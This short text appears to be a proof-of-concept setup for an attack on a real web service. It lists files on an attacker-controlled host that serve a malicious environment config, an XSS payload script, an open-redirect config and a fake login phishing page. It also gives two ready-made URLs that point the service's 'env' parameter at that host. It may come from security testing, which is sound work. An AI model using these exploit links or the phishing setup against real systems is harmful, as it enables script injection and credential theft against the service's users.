Serving (all responses with Access-Control-Allow-Origin: *):
https://xss.antoniusblock.net/x.json — malicious environment config (XSS)https://xss.antoniusblock.net/or_config.json — open-redirect variant confighttps://xss.antoniusblock.net/payload.js — XSS payload (alert popup)https://xss.antoniusblock.net/phish — fake login page (open-redirect target)https://onex.telenor.se/switchboard/?env=https%3A%2F%2Fxss.antoniusblock.net%2Fx[open]
https://onex.telenor.se/switchboard/?env=https%3A%2F%2Fxss.antoniusblock.net%2For_config[open]